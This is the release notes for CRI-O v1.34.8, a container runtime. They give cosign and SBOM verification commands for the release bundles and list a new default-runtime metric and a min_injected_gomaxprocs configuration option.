v1.34.7...v1.34.8 on Tue, 05 May 2026 00:45:22 UTC.

Downloads

Download one of our static release bundles via our Google Cloud Bucket:

To verify the artifact signatures via cosign, run:

> export COSIGN_EXPERIMENTAL=1
> cosign verify-blob cri-o.amd64.v1.34.8.tar.gz \
    --certificate-identity https://github.com/cri-o/packaging/.github/workflows/obs.yml@refs/heads/main \
    --certificate-oidc-issuer https://token.actions.githubusercontent.com \
    --certificate-github-workflow-repository cri-o/packaging \
    --certificate-github-workflow-ref refs/heads/main \
    --bundle cri-o.amd64.v1.34.8.tar.gz.bundle

To verify the bill of materials (SBOM) in SPDX format using the bom tool, run:

> tar xfz cri-o.amd64.v1.34.8.tar.gz
> bom validate -e cri-o.amd64.v1.34.8.tar.gz.spdx -d cri-o

Changelog since v1.34.7

Changes by Kind

Dependency-Change

Uncategorized

  • Add container_runtime_crio_default_runtime metric to display which default runtime the node is configured to use (#9899, @openshift-cherrypick-robot)
  • Add min_injected_gomaxprocs option, which allows a user to specify GOMAXPROCS in every container CRI-O creates. The config field itself is an integer that represents the floor of GOMAXPROCS. CRI-O will inject max(floor, cpu.request), if the pod is not a guaranteed pod or is part of a partitioned workload (#9886, @haircommander)

Dependencies

Added

Nothing has changed.

Changed

Removed

Nothing has changed.